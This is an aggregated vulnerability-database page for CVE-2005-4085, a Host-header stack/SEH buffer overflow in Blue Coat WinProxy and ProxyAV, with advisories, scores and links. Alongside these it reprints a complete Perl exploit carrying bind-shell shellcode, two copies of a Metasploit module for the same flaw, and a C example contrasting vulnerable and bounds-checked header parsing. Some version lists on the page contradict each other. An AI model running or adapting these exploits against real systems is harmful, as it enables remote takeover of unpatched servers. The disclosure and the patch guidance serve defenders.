CVE-2005-4085
CVSS 7.5
Published: 2005-12-31 00:00:00
Revised: 2011-03-07 21:27:40

[Original] Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.


[CNNVD] Blue Coat Systems WinProxy Host header request field remote overflow vulnerability (CNNVD-200512-996)

        BlueCoat WinProxy is an Internet sharing proxy server for small and medium businesses.
        WinProxy's handling of request header fields contains a remote overflow vulnerability; a remote attacker may exploit it to execute arbitrary commands on the server. The attacker can trigger the vulnerability by sending an overly long Host: string to the web proxy service, overwriting the frame's SEH handler and taking control of EIP. An attacker who successfully exploits this vulnerability can remotely execute arbitrary code.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely information disclosure]
Integrity impact: PARTIAL [may lead to system files being modified]
Availability impact: PARTIAL [may lead to degraded performance or interrupted resource access]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:bluecoat:webproxy:4.0:r1h    Blue Coat Systems WebProxy 4.0 R1h
cpe:/a:bluecoat:webproxy:5.0:r1b    Blue Coat Systems WebProxy 5.0 R1b
cpe:/a:bluecoat:webproxy:5.0:r1c    Blue Coat Systems WebProxy 5.0 R1c
cpe:/a:bluecoat:webproxy:4.0:r1e    Blue Coat Systems WebProxy 4.0 R1e
cpe:/a:bluecoat:webproxy:5.1:r1d    Blue Coat Systems WebProxy 5.1 R1d
cpe:/a:bluecoat:webproxy:5.1:r1a    Blue Coat Systems WebProxy 5.1 R1a
cpe:/a:bluecoat:webproxy:6.0:r1c    Blue Coat Systems WebProxy 6.0 R1c
cpe:/a:bluecoat:webproxy:4.0:r1b    Blue Coat Systems WebProxy 4.0b
cpe:/h:bluecoat:proxyav             Blue Coat Systems ProxyAV
cpe:/a:bluecoat:webproxy:4.0:r1k    Blue Coat Systems WebProxy 4.0 R1k
cpe:/a:bluecoat:webproxy:5.1:r1e    Blue Coat Systems WebProxy 5.1 R1e
cpe:/a:bluecoat:webproxy:4.0:r1m    Blue Coat Systems WebProxy 4.0 R1m
cpe:/a:bluecoat:webproxy:4.0:r1p    Blue Coat Systems WebProxy 4.0 R1p
cpe:/a:bluecoat:webproxy:4.0:r1f    Blue Coat Systems WebProxy 4.0 R1f
cpe:/a:bluecoat:webproxy:5.0:r1a    Blue Coat Systems WebProxy 5.0 R1a
cpe:/a:bluecoat:webproxy:4.0:r1a    Blue Coat Systems WebProxy 4.0a
cpe:/a:bluecoat:webproxy:4.0:r1n    Blue Coat Systems WebProxy 4.0 R1n
cpe:/a:bluecoat:webproxy:6.0:r1a    Blue Coat Systems WebProxy 6.0 R1a
cpe:/a:bluecoat:webproxy:4.0:r1c    Blue Coat Systems WebProxy 4.0c
cpe:/a:bluecoat:webproxy:5.2:r1a    Blue Coat Systems WebProxy 5.2 R1a

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4085
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4085
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-996
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/16147
(PATCH)  BID  16147
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
(VENDOR_ADVISORY)  IDEFENSE  20060105 Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability
http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
(VENDOR_ADVISORY)  CONFIRM  http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
http://securitytracker.com/id?1015441
(VENDOR_ADVISORY)  SECTRACK  1015441
http://secunia.com/advisories/18909
(VENDOR_ADVISORY)  SECUNIA  18909
http://secunia.com/advisories/18288
(VENDOR_ADVISORY)  SECUNIA  18288
http://www.vupen.com/english/advisories/2006/0622
(UNKNOWN)  VUPEN  ADV-2006-0622
http://www.vupen.com/english/advisories/2006/0065
(UNKNOWN)  VUPEN  ADV-2006-0065

- Vulnerability information (CNNVD)

Blue Coat Systems WinProxy Host header request field remote overflow vulnerability
High risk  Buffer overflow
2005-12-31 00:00:00 2006-06-05 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue; it can be obtained from:
        http://download.winproxy.com/downloads/WinProxy.exe

- Vulnerability information (1408)

BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit (EDBID:1408)
windows remote
2006-01-07 Verified
80 FistFuXXer
N/A
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author:  FistFucker (aka FistFuXXer)
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;

#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" );  # POP/POP/RET
                                       # PAVDLL.01031240

#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32";             # [NOP][NOP][JMP|JMP]

#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
      "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c".
      "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28".
      "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a".
      "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b".
      "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48".
      "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28".
      "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3".
      "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73".
      "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1".
      "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0".
      "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42".
      "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb".
      "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea".
      "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4".
      "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3".
      "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e".
      "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c".
      "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2".
      "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73".
      "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0".
      "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";


print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";
print "[+] Trying to overwrite SE handler...\n";

$sock->send( "GET / HTTP/1.0\r\n" );
$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );

print "[+] Done. Now check for bind shell on $ip:4444!";

close($sock);

# milw0rm.com [2006-01-07]
		

- Vulnerability information (16691)

Blue Coat WinProxy Host Header Overflow (EDBID:16691)
windows remote
2010-07-12 Verified
80 metasploit
N/A
##
# $Id: bluecoat_winproxy_host.rb 9797 2010-07-12 23:25:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Blue Coat WinProxy Host Header Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the Blue Coat Systems WinProxy
				service by sending a long port value for the Host header in a HTTP
				request.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9797 $',
			'References'     =>
				[
					['CVE', '2005-4085'],
					['OSVDB', '22238'],
					['BID', '16147'],
					['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jan 5 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80)
			], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET / HTTP/1.1" + "\r\n"
		sploit += "Host: 127.0.0.1:"
		sploit += rand_text_english(31, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[23, seh.length] = seh
		sploit += "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83192)

Blue Coat WinProxy Host Header Overflow (PacketStormID:F83192)
2009-11-26 00:00:00
MC  metasploit.com
exploit,web,overflow
CVE-2005-4085

This Metasploit module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Blue Coat WinProxy Host Header Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the Blue Coat Systems WinProxy
				service by sending a long port value for the Host header in a HTTP
				request.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2005-4085'],
					['OSVDB', '22238'],
					['BID', '16147'],
					['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll
				],

			'Privileged'     => true,

			'DisclosureDate' => 'January 5 2005',

			'DefaultTarget' => 0))

			register_options(
				[
						Opt::RPORT(80)
				], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET / HTTP/1.1" + "\r\n" 
		sploit += "Host: 127.0.0.1:"
		sploit += rand_text_english(31, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[23, seh.length] = seh
		sploit += "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)
		
		handler
		disconnect
	end

end
    

- Vulnerability information (F42864)

iDEFENSE Security Advisory 2006-01-05.2 (PacketStormID:F42864)
2006-01-08 00:00:00
iDefense Labs,Manuel Santamarina Suarez  idefense.com
advisory,remote,web,overflow,arbitrary
CVE-2005-4085

iDefense Security Advisory 01.05.06 - Remote exploitation of a buffer overflow vulnerability in Blue Coat Systems Inc.'s WinProxy allows for the remote execution of arbitrary code by attackers. The vulnerability can be triggered by sending an overly long Host: string to the web proxy service.

Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

  http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Blue Coat
Systems Inc.'s WinProxy allows for the remote execution of arbitrary
code by attackers.
 
The vulnerability can be triggered by sending an overly long Host:
string to the web proxy service.

III. ANALYSIS

Exploitation of this vulnerability is trivial. An overly long header
directly overwrites the SEH handler for the frame allowing for control
over EIP.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. All previous
versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy web proxy protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4085 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/07/2005  Initial vendor notification
12/08/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright     

- Vulnerability information (OSVDB 22238)

OSVDB ID: 22238
Blue Coat WinProxy / ProxyAV Host Header Remote Overflow
Location: Remote / Network Access   Attack Type: Input Manipulation
Impact: Loss of Integrity   Solution: Upgrade
Exploit: Public   Disclosure: Vendor Verified, Coordinated Disclosure

- Vulnerability description

A buffer overflow exists in WinProxy and ProxyAV. The web server fails to validate Host header data resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-01-05 2005-12-07
2006-01-07 2006-01-05

- Solution

Upgrade to version 6.1a or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information (BID 16147)

Blue Coat Systems WinProxy Remote Host Header Buffer Overflow Vulnerability
Class: Boundary Condition Error   Bugtraq ID: 16147
Remote: Yes   Local: No
Published: 2006-01-05 12:00:00   Updated: 2007-11-15 12:37:00
Credit: FistFuXXer discovered this vulnerability.

- Affected program versions

Blue Coat Systems WebProxy 6.0
Blue Coat Systems ProxyAV
Blue Coat Systems WebProxy 6.1 a
Blue Coat Systems ProxyAV 2.4.2

- Unaffected program versions

Blue Coat Systems WebProxy 6.1 a
Blue Coat Systems ProxyAV 2.4.2

- Vulnerability discussion

A remote buffer-overflow vulnerability affects Blue Coat Systems WinProxy because the application fails to properly validate the length of user-supplied strings before copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the vulnerable application. This may facilitate unauthorized access or privilege escalation.

Blue Coat Systems WinProxy 6.0 is vulnerable to this issue; other versions may also be affected.

Blue Coat Systems ProxyAV is also affected by this issue.
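The discussion above names the bug class: the Host header value is copied into a fixed-size buffer without a length check. The following is an added example, not code from the page, from Blue Coat or from the advisory; the buffer size, the function names and the constructed sample request are assumptions, and bracketed IPv6 literals are out of scope. It shows the unchecked copy beside a version that rejects values that do not fit and validates the port suffix, which is the check a proxy's header parser needs at this point.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical buffer size; the real proxy's buffer size is not on the page. */
#define HOST_MAX 64

/* Vulnerable pattern (for contrast only; never call it on untrusted input):
   the Host value is copied into the caller's fixed buffer with no bound, so
   an overlong value writes past the buffer and, on Windows, can reach the
   frame's SEH record, which is the condition the advisory describes. */
int host_copy_unchecked(const char *request, char *out)
{
    const char *p = strstr(request, "Host: ");
    if (p == NULL)
        return -1;
    p += 6;
    const char *end = strstr(p, "\r\n");
    size_t len = end ? (size_t)(end - p) : strlen(p);
    memcpy(out, p, len);          /* no length check against the buffer */
    out[len] = '\0';
    return 0;
}

/* Hardened version: the value must fit in out_size including the NUL, and an
   optional ":port" suffix must be 1-5 digits with a value in 1..65535.
   Returns 0 on success, -1 if there is no Host header, -2 if the value would
   overflow the buffer, -3 if the port is malformed. */
int parse_host_header(const char *request, char *out, size_t out_size)
{
    const char *p = strstr(request, "Host: ");
    if (p == NULL)
        return -1;
    p += 6;
    const char *end = strstr(p, "\r\n");
    size_t len = end ? (size_t)(end - p) : strlen(p);
    if (len == 0 || len >= out_size)
        return -2;                /* reject rather than truncate silently */
    memcpy(out, p, len);
    out[len] = '\0';

    char *colon = strrchr(out, ':');
    if (colon != NULL) {
        const char *d = colon + 1;
        size_t digits = strlen(d);
        if (digits == 0 || digits > 5)
            return -3;
        unsigned long port = 0;
        for (; *d != '\0'; d++) {
            if (*d < '0' || *d > '9')
                return -3;
            port = port * 10 + (unsigned long)(*d - '0');
        }
        if (port == 0 || port > 65535)
            return -3;
    }
    return 0;
}

/* Constructed sample request whose port field is port_len '9' characters:
   the header shape the advisory describes, carrying no payload. */
int build_sample_request(size_t port_len, char *buf, size_t buf_size)
{
    const char *head = "GET / HTTP/1.1\r\nHost: 127.0.0.1:";
    const char *tail = "\r\n\r\n";
    size_t hl = strlen(head), tl = strlen(tail);
    if (hl + port_len + tl + 1 > buf_size)
        return -1;
    memcpy(buf, head, hl);
    memset(buf + hl, '9', port_len);
    memcpy(buf + hl + port_len, tail, tl + 1);   /* copies the NUL too */
    return 0;
}

int main(void)
{
    char req[512];
    char host[HOST_MAX];

    build_sample_request(4, req, sizeof req);
    printf("4-char port   -> rc=%d host=%s\n",
           parse_host_header(req, host, sizeof host), host);

    build_sample_request(300, req, sizeof req);
    printf("300-char port -> rc=%d (rejected before any copy)\n",
           parse_host_header(req, host, sizeof host));
    return 0;
}
```

The rejecting parser returns a distinct code for "does not fit" so the caller can answer with a 400 and log the event; a proxy that silently truncates would still accept the request, which hides the probe from the operator.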

- Exploitation

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The 'CAN-2005-4085_exploit.pl' exploit is provided by FistFucker <FistFuXXer@gmx.de>.

The 'bluecoat_winproxy.pm' Metasploit Framework exploit is provided by y0 <y0@w00t-shell.net>.

- Solution

The vendor has released WinProxy 6.1a and ProxyAV 2.4.2.3 to address this and other issues.


Blue Coat Systems WebProxy 6.0
